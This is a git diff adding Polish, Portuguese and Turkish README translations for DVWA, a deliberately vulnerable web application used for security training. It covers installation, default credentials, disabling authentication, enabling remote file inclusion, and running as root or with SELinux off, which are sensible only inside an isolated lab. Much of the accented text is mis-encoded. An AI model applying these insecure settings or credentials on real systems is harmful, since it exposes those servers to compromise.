+ +- - - + +## Zgłaszanie błędÃŗw + +W skrÃŗcie: prosimy, nie zgłaszaj ich! + +Raz na jakiś czas ktoś zgłasza raport dotyczący błędu, ktÃŗry znalazł w aplikacji – niektÃŗre są dobrze napisane, czasem nawet lepiej niÅŧ raporty z testÃŗw penetracyjnych, ktÃŗre widziałem, a niektÃŗre to po prostu „brakuje nagłÃŗwkÃŗw, zapłaćcie mi”. + +W 2023 roku sytuacja eskalowała, gdy ktoś zgłosił prośbę o nadanie CVE dla jednej z luk, i otrzymał numer [CVE-2023-39848](https://nvd.nist.gov/vuln/detail/CVE-2023-39848). Sytuacja była zabawna i czas został zmarnowany na poprawki. + +Aplikacja zawiera podatności i jest to zamierzone. Większość to dobrze udokumentowane przypadki, ktÃŗre analizujesz jako lekcje, inne to „ukryte” luki, ktÃŗre masz znaleÅēć samodzielnie. Jeśli naprawdę chcesz pokazać swoje umiejętności w odnajdywaniu dodatkowych błędÃŗw, napisz post na blogu lub stwÃŗrz film – są osoby, ktÃŗre mogą być zainteresowane nauką, jak je znaleÅēć. Jeśli prześlesz nam link, moÅŧemy nawet uwzględnić go w odniesieniach. + +## Linki + +Strona projektu: + +*Stworzone przez zespÃŗł DVWA* diff --git a/DVWA/README.pt.md b/DVWA/README.pt.md new file mode 100644 index 00000000..0259fc47 --- /dev/null +++ b/DVWA/README.pt.md @@ -0,0 +1,436 @@ +# DAMN VULNERABLE WEB APPLICATION + +Damn Vulnerable Web Application (DVWA) Ê um aplicativo web em PHP/MySQL que Ê extremamente vulnerÃĄvel. Seu principal objetivo Ê auxiliar profissionais de segurança a testar suas habilidades e ferramentas em um ambiente legal, ajudar desenvolvedores web a entender melhor os processos de segurança de aplicaçÃĩes web e auxiliar tanto estudantes quanto professores a aprender sobre segurança de aplicaçÃĩes web em um entorno controlado em sala de aula. + +O objetivo do DVWA Ê permitir a prÃĄtica de algumas das vulnerabilidades web mais comuns, com vÃĄrios níveis de dificuldade, por meio de uma interface simples e direta. +Tenha em mente que existem vulnerabilidades documentadas e nÃŖo documentadas neste software. Isso Ê intencional. Encorajamos vocÃĒ a tentar descobrir o maior nÃēmero possível de problemas. +- - - + +## AVISO! + +DVWA Ê muito vulnerÃĄvel! **NÃŖo a carregue na pasta pÃēblica html do seu provedor de hospedagem ou em qualquer servidor voltado para a Internet**, pois eles serÃŖo comprometidos. É recomendÃĄvel usar uma mÃĄquina virtual (como [VirtualBox](https://www.virtualbox.org/) ou [VMware](https://www.vmware.com/)), configurada no modo de rede NAT. Dentro da mÃĄquina virtual, vocÃĒ pode baixar e instalar o [XAMPP](https://www.apachefriends.org/) para o servidor web e banco de dados. + +### ISENÇÃO DE RESPONSABILIDADE + +NÃŖo nos responsabilizamos pela forma como alguÊm utiliza esta aplicaçÃŖo (DVWA). Deixamos claro os objetivos da aplicaçÃŖo e nÃŖo deve ser utilizada maliciosamente. Foram fornecidos avisos e medidas para evitar que os usuÃĄrios instalem o DVWA em servidores web ativos. Se o seu servidor web for comprometido atravÊs da instalaçÃŖo do DVWA, nÃŖo Ê de nossa responsabilidade, mas sim da pessoa(s) que o instalou. + +- - - + +## Licença + +Este arquivo faz parte do Damn Vulnerable Web Application (DVWA). + +Damn Vulnerable Web Application (DVWA) Ê um software livre: vocÃĒ pode redistribuí-lo e/ou modificÃĄ-lo sob os termos da Licença PÃēblica Geral GNU, publicada pela Free Software Foundation, na versÃŖo 3 da Licença ou +(em sua opçÃŖo) qualquer versÃŖo posterior. + +Damn Vulnerable Web Application (DVWA) Ê distribuído na esperança de que seja Ãētil, +mas SEM NENHUMA GARANTIA; sem mesmo a garantia implícita de +COMERCIALIZAÇÃO ou ADEQUAÇÃO A UM PROPÓSITO ESPECÍFICO. Consulte a +Licença PÃēblica Geral GNU para obter mais detalhes. + +VocÃĒ deve ter recebido uma cÃŗpia da Licença PÃēblica Geral GNU +junto com o Damn Vulnerable Web Application (DVWA). Se nÃŖo recebeu, consulte https://www.gnu.org/licenses/. + +- - - + +## Internationalisation + +Este arquivo estÃĄ disponível em vÃĄrios idiomas. + +- Árabe: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- ChinÃĒs: [įŽ€äŊ“中文](README.zh.md) +- Espanhol: [EspaÃąol](README.es.md) +- FrancÃĒs: [Français](README.fr.md) +- InglÃĒs: [English](README.md) +- Persa: [ŲØ§ØąØŗی](README.fa.md) +- Turco: [TÃŧrkçe](README.tr.md) + +Se vocÃĒ deseja contribuir com uma traduçÃŖo, por favor envie uma solicitaçÃŖo de pull. No entanto, isso nÃŖo significa apenas executar a traduçÃŖo pelo Google Translate e enviar, pois essas serÃŖo rejeitadas. Envie a versÃŖo traduzida adicionando um novo arquivo 'README.xx.md' onde xx Ê o cÃŗdigo de duas letras do idioma desejado (com base no [ISO 639-1](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes)). + +- - - + +## Descarga + +Enquanto existem vÃĄrias versÃĩes do DVWA disponíveis, a Ãēnica versÃŖo suportada Ê a Ãēltima do cÃŗdigo-fonte do repositÃŗrio oficial do GitHub. VocÃĒ pode clonÃĄ-lo do repositÃŗrio: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +Ou [baixe um ZIP dos arquivos](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## InstalaçÃŖo + +### Installation Videos + +- [Installing DVWA on Kali running in VirtualBox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Installing DVWA on Windows using XAMPP](https://youtu.be/Yzksa_WjnY0) +- [Installing Damn Vulnerable Web Application (DVWA) on Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +The easiest way to install DVWA is to download and install [XAMPP](https://www.apachefriends.org/) if you do not already have a web server setup. + +XAMPP is a very easy to install Apache Distribution for Linux, Solaris, Windows and Mac OS X. The package includes the Apache web server, MySQL, PHP, Perl, a FTP server and phpMyAdmin. + +This [video](https://youtu.be/Yzksa_WjnY0) walks you through the installation process for Windows but it should be similar for other OSs. + +### Arquivo de configuraçÃŖo + +DVWA vem com uma cÃŗpia fictícia do seu arquivo de configuraçÃŖo que vocÃĒ precisa copiar para o local correto e fazer as alteraçÃĩes apropriadas. No Linux, supondo que vocÃĒ esteja no diretÃŗrio do DVWA, isso pode ser feito da seguinte forma: + +`cp config/config.inc.php.dist config/config.inc.php` + +No Windows, isso pode ser um pouco mais difícil se vocÃĒ estiver ocultando as extensÃĩes de arquivo. Se vocÃĒ nÃŖo tem certeza disso, este post de blog explica mais sobre o assunto: + +[How to Make Windows Show File Extensions](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Linux Packages + +Se vocÃĒ estiver usando uma distribuiçÃŖo Linux baseada em Debian, serÃĄ necessÃĄrio instalar os seguintes pacotes (ou seus equivalentes): + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +É recomendado fazer uma atualizaçÃŖo antes disso para garantir que vocÃĒ vai obter a versÃŖo mais recente de tudo + +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +Embora o site possa funcionar com MySQL, recomendamos fortemente o uso do MariaDB, jÃĄ que ele Ê compatível sem necessidade de ajustes adicionaisr. + +### ConfiguraçÃŖo do Banco de Dados + +Para configurar o banco de dados, basta clicar no botÃŖo `Setup DVWA` no menu principal e, em seguida, clicar no botÃŖo `Create / Reset Database`. Isso irÃĄ criar/reconfigurar o banco de dados para vocÃĒ com alguns dados. + +Se vocÃĒ receber um erro ao tentar criar seu banco de dados, verifique se suas credenciais do banco de dados estÃŖo corretas dentro de `./config/config.inc.php`. *Isso difere do config.inc.php.dist, que Ê um arquivo de exemplo.* + +Por padrÃŖo, as variÃĄveis sÃŖo definidas da seguinte maneira: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306';$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +ObservaçÃŖo: se vocÃĒ estiver usando o MariaDB em vez do MySQL (o MariaDB Ê o padrÃŖo no Kali), vocÃĒ nÃŖo pode usar o usuÃĄrio root do banco de dados, vocÃĒ deve criar um novo usuÃĄrio de banco de dados. Para fazer isso, conecte-se ao banco de dados como usuÃĄrio root e use os seguintes comandos: + +```mysql +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Desabilitar autenticaçÃŖo + +Alguns ferramentas nÃŖo funcionam bem com autenticaçÃŖo e nÃŖo podem ser usadas com o DVWA. Para contornar isso, hÃĄ uma opçÃŖo de configuraçÃŖo para desativar a verificaçÃŖo de autenticaçÃŖo. Para fazer isso, basta definir o seguinte no arquivo de configuraçÃŖo: + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` + +VocÃĒ tambÊm precisarÃĄ definir o nível de segurança que seja apropriado para os testes que deseja realizar: + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` +Nesse estado, vocÃĒ pode acessar todos os recursos sem precisar fazer login ou definir cookies. + +### Outra configuraçÃŖo + +Dependendo do seu sistema operacional, assim como a versÃŖo do PHP, vocÃĒ pode desejar alterar a configuraçÃŖo padrÃŖo. A localizaçÃŖo dos arquivos serÃĄ diferente em cada mÃĄquina. + +**PermissÃĩes de diretÃŗrio**: + +* `./hackable/uploads/` - Precisa estar com permissÃŖo de escrita pelo serviço web (para envio de arquivos). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - Precisa estar gravÃĄvel pelo serviço web (se vocÃĒ deseja usar o PHPIDS). + +**PHP configuration**: +* Para permitir InclusÃĩes de Arquivos Remotos (RFI): + * `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + * `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] +* Para reduzir opcionalmente a verbosidade ocultando mensagens de aviso do PHP: + * `display_errors = off` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + +**Arquivo: `config/config.inc.php`**: + +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - Esses valores precisam ser gerados em: https://www.google.com/recaptcha/admin/create + +### Credenciais PadrÃŖo + +**Default username = `admin`** + +**Default password = `password`** + +_...Podem ser facilmente bruteforceados ;)_ + +Login URL: http://127.0.0.1/login.php + +_Nota: Isso serÃĄ diferente se vocÃĒ instalou o DVWA em um diretÃŗrio diferente._ + +- - - + +## Docker Container + +_Esta seçÃŖo do readme foi adicionada por @thegrims, para suporte com Docker, por favor entre em contato com ele ou @opsxcq que Ê o mantenedor da imagem e repositÃŗrio Docker. Qualquer ticket de problema provavelmente serÃĄ encaminhado para eles e fechado._ + +- [dockerhub site](https://hub.docker.com/r/vulnerables/web-dvwa/) +`docker run --rm -it -p 80:80 vulnerables/web-dvwa` + +Por favor, certifique-se de que estÃĄ usando aufs devido a problemas anteriores do MySQL. Execute `docker info` para verificar seu driver de armazenamento. Se nÃŖo for aufs, altere-o como tal. Existem guias para cada sistema operacional sobre como fazer isso, mas sÃŖo bastante diferentes, entÃŖo nÃŖo abordaremos isso aqui. + +- - - + +## Troubleshooting + +Estes pressupÃĩem que vocÃĒ estÃĄ em uma distribuiçÃŖo baseada em Debian, como Debian, Ubuntu e Kali. Para outras distribuiçÃĩes, siga o tutorial, mas atualize o comando, se necessÃĄrio. + +### Acessei o site e obtive um erro 404 + +Se vocÃĒ estÃĄ tendo esse problema, precisa entender as localizaçÃĩes dos arquivos. Por padrÃŖo, a raiz do documento Apache (o local onde ele começa a procurar conteÃēdo da web) Ê `/var/www/html`. Se vocÃĒ colocar o arquivo `hello.txt` neste diretÃŗrio, para acessÃĄ-lo, vocÃĒ deve navegar para `http://localhost/hello.txt`. + +Se vocÃĒ criou um diretÃŗrio e colocou o arquivo lÃĄ - `/var/www/html/mydir/hello.txt` - vocÃĒ precisarÃĄ navegar para `http://localhost/mydir/hello.txt`. + +O Linux Ê sensível a maiÃēsculas e minÃēsculas por padrÃŖo e, portanto, no exemplo acima, se vocÃĒ tentasse navegar em qualquer um desses endereços, receberia um erro `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +Como isso afeta o DVWA? A maioria das pessoas usa o Git para baixar o DVWA em `/var/www/html`, o que lhes dÃĄ o diretÃŗrio `/var/www/html/DVWA/` com todos os arquivos do DVWA dentro dele. EntÃŖo, eles navegam atÊ `http://localhost/` e recebem um `404` ou a pÃĄgina de boas-vindas padrÃŖo do Apache. Como os arquivos estÃŖo em DVWA, vocÃĒ deve navegar para `http://localhost/DVWA`. + +O outro erro comum Ê navegar para `http://localhost/dvwa`, o que resultarÃĄ em um erro `404` porque `dvwa` nÃŖo Ê o mesmo que `DVWA` em termos de correspondÃĒncia de diretÃŗrio no Linux. + +Portanto, apÃŗs a instalaçÃŖo, se vocÃĒ tentar visitar o site e receber um erro `404`, pense em onde instalou os arquivos, em relaçÃŖo à raiz do documento, e qual Ê a caixa (alta ou baixa). + +### "Acess denied" ao executar a configuraçÃŖo + +Se vocÃĒ vir o seguinte ao executar o script de configuraçÃŖo, significa que o nome de usuÃĄrio ou a senha no arquivo de configuraçÃŖo nÃŖo correspondem aos configurados no banco de dados: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (usando a senha "YES"). +``` + +O erro estÃĄ dizendo que vocÃĒ estÃĄ usando o nome de usuÃĄrio `notdvwa`. + +O seguinte erro indica que vocÃĒ apontou o arquivo de configuraçÃŖo para o banco de dados errado. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +EstÃĄ dizendo que vocÃĒ estÃĄ usando o usuÃĄrio `dvwa` e tentando se conectar ao banco de dados `notdvwa`. + +A primeira coisa a fazer Ê verificar se o que vocÃĒ acha que colocou no arquivo de configuraçÃŖo Ê realmente o que estÃĄ lÃĄ. + +Se corresponder ao que vocÃĒ espera, a prÃŗxima coisa a fazer Ê verificar se vocÃĒ pode fazer login como usuÃĄrio no terminal. Supondo que vocÃĒ tenha um usuÃĄrio de banco de dados chamado dvwa e uma senha de p@ssw0rd, execute o seguinte comando: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` +Nota: NÃŖo hÃĄ espaço apÃŗs o -p + +Se vocÃĒ vir o seguinte, a senha estÃĄ correta: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +Como vocÃĒ conseguiu conectar no terminal, provavelmente algo estÃĄ errado no arquivo de configuraçÃŖo. Verifique novamente o arquivo e se ainda assim nÃŖo conseguir resolver, abra um issue. + +Se vocÃĒ receber a seguinte mensagem, significa que o nome de usuÃĄrio ou a senha que vocÃĒ estÃĄ usando estÃŖo incorretos. Repita as etapas da [ConfiguraçÃŖo do Banco de Dados](#database-setup) e certifique-se de usar o mesmo nome de usuÃĄrio e senha em todo o processo. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (usando a senha: YES) +``` + +Se vocÃĒ obtiver o seguinte erro, as credenciais do usuÃĄrio estÃŖo corretas, mas o usuÃĄrio nÃŖo tem acesso ao banco de dados. Novamente, repita as etapas de configuraçÃŖo e verifique o nome do banco de dados que vocÃĒ estÃĄ usando. + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` +O erro final que vocÃĒ pode receber Ê este: + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +Este nÃŖo Ê um problema de autenticaçÃŖo, mas indica que o servidor de banco de dados nÃŖo estÃĄ em execuçÃŖo. Inicie-o com o seguinte comando: + +```sh +sudo service mysql start +``` + +### Unknown authentication method + +Com as versÃĩes mais recentes do MySQL, o PHP nÃŖo pode mais se comunicar com o banco de dados em sua configuraçÃŖo padrÃŖo. Se vocÃĒ tentar executar o script de configuraçÃŖo e receber a seguinte mensagem, significa que hÃĄ uma configuraçÃŖo incorreta. + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +VocÃĒ tem duas opçÃĩes, a mais fÃĄcil Ê desinstalar o MySQL e instalar o MariaDB. O seguinte Ê o guia oficial do projeto MariaDB: + + + +Alternativamente, siga estes passos: + +1. Como root, edite o seguinte arquivo: `/etc/mysql/mysql.conf.d/mysqld.cnf` +2. Abaixo da linha `[mysqld]`, adicione o seguinte: + `default-authentication-plugin=mysql_native_password` +3. Reinicie o banco de dados: `sudo service mysql restart` +4. Verifique o mÊtodo de autenticaçÃŖo para o usuÃĄrio do seu banco de dados: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + +5. Provavelmente vocÃĒ verÃĄ `caching_sha2_password`. Se for esse o caso, execute o seguinte comando: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +6. Executando novamente a verificaçÃŖo, agora vocÃĒ deve ver `mysql_native_password`. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +ApÃŗs tudo isso, o processo de configuraçÃŖo deve funcionar normalmente. + +Se vocÃĒ quiser mais informaçÃĩes, consulte a seguinte pÃĄgina: https://www.php.net/manual/en/mysqli.requirements.php. + +### Database Error #2002: No such file or directory. + +O servidor de banco de dados nÃŖo estÃĄ em execuçÃŖo. Em uma distribuiçÃŖo baseada em Debian, isso pode ser feito com o seguinte comando: + +```sh +sudo service mysql start +``` + +### Erros "MySQL server has gone away" and "Packets out of order" + +Existem algumas razÃĩes pelas quais vocÃĒ pode estar recebendo esses erros, mas a mais provÃĄvel Ê que a versÃŖo do servidor de banco de dados que vocÃĒ estÃĄ executando nÃŖo seja compatível com a versÃŖo do PHP. + +Isso Ê mais comumente encontrado quando vocÃĒ estÃĄ executando a versÃŖo mais recente do MySQL, pois o PHP e o MySQL nÃŖo se dÃŖo bem. O melhor conselho Ê abandonar o MySQL e instalar o MariaDB, jÃĄ que isso nÃŖo Ê algo que possamos oferecer suporte. + +Para mais informaçÃĩes, consulte: + + + +### InjeçÃŖo de comando nÃŖo funciona + +O Apache pode nÃŖo ter privilÊgios suficientes para executar comandos no servidor web. Se vocÃĒ estiver executando o DVWA no Linux, certifique-se de estar logado como root. No Windows, faça login como Administrador. + +### Por que o banco de dados nÃŖo pode se conectar no CentOS? + +VocÃĒ pode estar tendo problemas com o SELinux. Desative o SELinux ou execute este comando para permitir que o servidor web se comunique com o banco de dados: +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Mais Alguma Coisa + +Para obter as informaçÃĩes mais recentes de soluçÃŖo de problemas, leia os tickets abertos e fechados no repositÃŗrio do git: + + + +Antes de enviar um ticket, certifique-se de que estÃĄ executando a versÃŖo mais recente do cÃŗdigo do repositÃŗrio. Esta nÃŖo Ê a Ãēltima versÃŖo lançada, mas sim o Ãēltimo cÃŗdigo da master branch. + +Se vocÃĒ estiver abrindo um chamado de suporte, por favor, forneça pelo menos as seguintes informaçÃĩes: + +- Sistema operacional +- As Ãēltimas 5 linhas do log de erro do servidor web logo apÃŗs o erro que estÃĄ relatando +- Se for um problema de autenticaçÃŖo do banco de dados, siga os passos acima e tire uma captura de tela de cada etapa. Envie essas informaçÃĩes juntamente com uma captura de tela da seçÃŖo do arquivo de configuraçÃŖo que mostra o usuÃĄrio e a senha do banco de dados. +- Uma descriçÃŖo completa do que estÃĄ acontecendo, o que vocÃĒ espera que aconteça e o que tentou fazer para resolver o problema. "login broken" nÃŖo Ê suficiente para entendermos o seu problema e ajudÃĄ-lo a corrigi-lo. + +- - - + +## Tutoriais + +Vou tentar criar alguns vídeos tutoriais que expliquem algumas das vulnerabilidades e mostrem como detectÃĄ-las e explorÃĄ-las. Aqui estÃŖo os que eu fiz atÊ agora: + +[Finding and Exploiting Reflected XSS](https://youtu.be/V4MATqtdxss) + +- - - + +## SQLite3 SQL Injection + +_O suporte para isso Ê limitado, antes de levantar problemas, por favor, certifique-se de estar preparado para depurar, nÃŖo simplesmente alegue "nÃŖo funciona"._ + +Por padrÃŖo, o SQLi e o Blind SQLi sÃŖo feitos contra o servidor MariaDB/MySQL usado pelo site, mas Ê possível alternar para fazer os testes SQLi contra o SQLite3. + +Eu nÃŖo vou cobrir como fazer o SQLite3 funcionar com o PHP, mas deve ser um caso simples de instalar o pacote `php-sqlite3` e garantir que ele esteja habilitado. + +Para fazer a mudança, simplesmente edite o arquivo de configuraçÃŖo e adicione ou edite estas linhas: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +Por padrÃŖo, ele usa o arquivo `database/sqli.db`, se vocÃĒ bagunçar, basta copiar `database/sqli.db.dist` por cima. + +Os desafios sÃŖo exatamente os mesmos do MySQL, mas sÃŖo executados no SQLite3 em vez disso. + +- - - + +👨‍đŸ’ģ Contribudores +----- + +Obrigado por todas as suas contribuiçÃĩes e por manter este projeto atualizado. :heart: + +Se vocÃĒ tiver alguma ideia, alguma melhoria ou simplesmente quiser colaborar, vocÃĒ Ê bem-vindo a contribuir e participar do projeto, sinta-se à vontade para enviar sua PR. + +

+ + + +

+ +- - - + +## Links + +Project Home: + +*Created by the DVWA team* + diff --git a/DVWA/README.tr.md b/DVWA/README.tr.md new file mode 100644 index 00000000..933458bf --- /dev/null +++ b/DVWA/README.tr.md @@ -0,0 +1,410 @@ +# DAMN VULNERABLE WEB APPLICATION + +Damn Vulnerable Web Application (DVWA), son derece zafiyetli bir PHP/MySQL web uygulamasÄądÄąr. Temel amacÄą; gÃŧvenlik uzmanlarÄąna, yeteneklerini ve araçlarÄąnÄą test etmeleri konusunda yasal bir ortam sunmak, web geliştiricilerinin web uygulamalarÄąnÄąn gÃŧvenliğini sağlama sÃŧreçlerini daha iyi anlamalarÄąna yardÄąmcÄą olmak, Ãļğrencilere ve eğitmenlere web uygulamalarÄąnÄąn gÃŧvenliğini Ãļğrenme/Ãļğretme konusunda kontrollÃŧ bir sÄąnÄąf ortamÄą sunmaktÄąr. + +DVWA, **en yaygÄąn web zafiyetlerinden bazÄąlarÄąnÄąn** basit bir arayÃŧz Ãŧzerinden **farklÄą zorluk seviyelerinde denenmesini** hedefler. Bu uygulamada, **dokÃŧmante edilmiş ve edilmemiş** zafiyetler olduğunu hatÄąrlatmakta fayda var. MÃŧmkÃŧn mertebe fazla problemi deneyin ve keşfedin! +- - - + +## UYARI! + +Damn Vulnerable Web Application epey zafiyetlidir! **Internet Ãŧzerinden erişilebilen bir sunucuya veya barÄąndÄąrma hizmeti sağlayÄącÄąnÄązÄąn public_html dizinine yÃŧklemeyin.** Bu durum, sunucunuzu tehlikeye atar. [VirtualBox](https://www.virtualbox.org/) veya [VMware](https://www.vmware.com/) gibi bir ortamda, sanal makinede, NAT ağı modunda kullanmanÄąz Ãļnerilir. Sanal makine içinde web sunucusu ve veri tabanÄą için [XAMPP](https://www.apachefriends.org/) indirip kurabilirsiniz. + +### Sorumluluk Reddi + +Herhangi bir kişinin bu uygulamayÄą (DVWA) nasÄąl kullandığı konusunda sorumluluk kabul etmiyoruz. UygulamanÄąn amaçlarÄąnÄą aÃ§Äąkça ifade ettik, bu uygulama kÃļtÃŧ amaçlarla kullanÄąlmamalÄądÄąr. KullanÄącÄąlarÄąn, DVWA'yÄą canlÄą ortamdaki web sunucularÄąna yÃŧklemelerine engel olmak için uyarÄąlarda bulunduk ve Ãļnlemler aldÄąk. Web sunucunuz, bir DVWA kurulumu nedeniyle tehlikeye dÃŧştÃŧyse, bu bizim sorumluluğumuz değildir. UygulamayÄą yÃŧkleyen ve kuran kişi ya da kişilerin sorumluluğudur. + +- - - + +## Lisans + +Bu dosya, Damn Vulnerable Web Application'Äąn (DVWA) bir parçasÄądÄąr. + +Damn Vulnerable Web Application (DVWA) bir ÃļzgÃŧr yazÄąlÄąmdÄąr. YazÄąlÄąmÄą; ÖzgÃŧr YazÄąlÄąm VakfÄą +tarafÄąndan yayÄąnlanan GNU Genel Kamu LisansÄą'nÄąn 3. versiyonu ya da tercihinize gÃļre daha yeni +bir versiyonunda yer alan koşullar altÄąnda yeniden dağıtabilir ve/veya değiştirebilirsiniz. + +Damn Vulnerable Web Application (DVWA), faydalÄą olmasÄą umuduyla, ancak HERHANGÄ° BÄ°R GARANTÄ° OLMADAN, +SATILABÄ°LÄ°RLÄ°K veya BELÄ°RLÄ° BÄ°R AMACA UYGUNLUK garantisi bile ima edilmeden dağıtÄąlmÄąÅŸtÄąr. +DetaylÄą bilgi için GNU Genel Kamu LisansÄą'nÄą inceleyiniz. + +Damn Vulnerable Web Application (DVWA) ile birlikte, GNU Genel Kamu LisansÄą'nÄąn da bir kopyasÄąnÄą +edinmiş olmalÄąsÄąnÄąz. Durum bÃļyle değilse, sayfasÄąnÄą inceleyiniz. + +- - - + +## UluslararasÄąlaştÄąrma + +Bu dosya, birden fazla dilde mevcuttur: + +- Çince: [įŽ€äŊ“中文](README.zh.md) +- Ä°ngilizce: [English](README.md) + +Çeviri katkÄąsÄąnda bulunmak istiyorsanÄąz lÃŧtfen PR aÃ§Äąn. Ancak dikkat edin; bu, dosyayÄą Google Translate'ten geçirip gÃļndermeniz anlamÄąna gelmemektedir. Bu tÃŧr talepler reddedilecektir. + +- - - + +## Ä°ndirme + +Her ne kadar DVWA'nÄąn farklÄą sÃŧrÃŧmleri de olsa, desteklenen tek sÃŧrÃŧm, resmi GitHub repository'sindeki son kaynak kodudur. Dilerseniz, repo'dan klonlayabilir: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +ya da [ZIP olarak indirebilirsiniz](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## Kurulum + +**LÃŧtfen config/config.inc.php dosyasÄąnÄązÄąn var olduğundan emin olun. YalnÄązca config.inc.php.dist dosyasÄąna sahip olmak yeterli olmayacaktÄąr. Bu dosyayÄą, ortamÄąnÄąza uygun şekilde dÃŧzenlemeniz ve config.inc.php şeklinde yeniden adlandÄąrmanÄąz gerekecektir. [Windows, dosya uzantÄąlarÄąnÄą gizleyebilir.](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/)** + +### Kurulum VideolarÄą + +- [Damn Vulnerable Web Application'Äąn (DVWA) Windows 10'da kurulumu](https://www.youtube.com/watch?v=cak2lQvBRAo) [12:39 dakika] + +### Windows + XAMPP + +Eğer bir web sunucusu kurulumunuz yoksa, DVWA'yÄą kurmanÄąn en kolay yolu [XAMPP](https://www.apachefriends.org/) indirip kurmaktÄąr. + +XAMPP; Linux, Solaris, Windows ve Mac OS X için kurulumu oldukça kolay bir Apache ÃŧrÃŧnÃŧdÃŧr. Paketin içeriğinde Apache web sunucusu, MySQL, PHP, Perl, bir FTP sunucusu ve phpMyAdmin yer almaktadÄąr. + +XAMPP'Äą şu bağlantÄądan indirebilirsiniz: + + +dvwa.zip dosyasÄąnÄą arşivden Ã§ÄąkarÄąn. Ã‡ÄąkarÄąlan dosyalarÄą public html dizininize taÅŸÄąyÄąn. Sonra tarayÄącÄąnÄązdan `http://127.0.0.1/dvwa/setup.php` adresine gidin. + +### Linux Paketleri + +Debian tabanlÄą bir Linux dağıtÄąmÄą kullanÄąyorsanÄąz, aşağıdaki paketleri _(ya da eşleniklerini)_ kurmanÄąz gerekmektedir: + +`apt-get -y install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php` + +Site, MariaDB yerine MySQL ile çalÄąÅŸacak. Ancak kullanÄąma hazÄąr geldiği için MariaDB'yi şiddetle tavsiye ediyoruz. MySQL'in doğru çalÄąÅŸmasÄą için ise bazÄą değişiklikler yapmanÄąz gerekiyor. + +### Veri TabanÄąnÄąn HazÄąrlanmasÄą + +Veri tabanÄąnÄą ayağa kaldÄąrmak için, Ãļnce ana menÃŧdeki `Setup DVWA` butonuna, sonra da `Create / Reset Database` butonuna tÄąklayÄąn. Bu işlem sizin için, içinde bir miktar veri ile birlikte veri tabanÄąnÄą oluşturacak ya da veri tabanÄąnÄązÄą sÄąfÄąrlayacaktÄąr. + +Eğer veri tabanÄąnÄą oluşturma sÄąrasÄąnda bir hata ile karÅŸÄąlaÅŸÄąrsanÄąz, `./config/config.inc.php` dosyasÄąndaki veri tabanÄą giriş bilgilerinin doğru olduğundan emin olun. *Bu, sadece bir Ãļrnek dosya olan config.inc.php.dist dosyasÄąndan farklÄądÄąr.* + +Değişkenler, varsayÄąlan olarak aşağıdaki gibi ayarlanmÄąÅŸtÄąr: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; 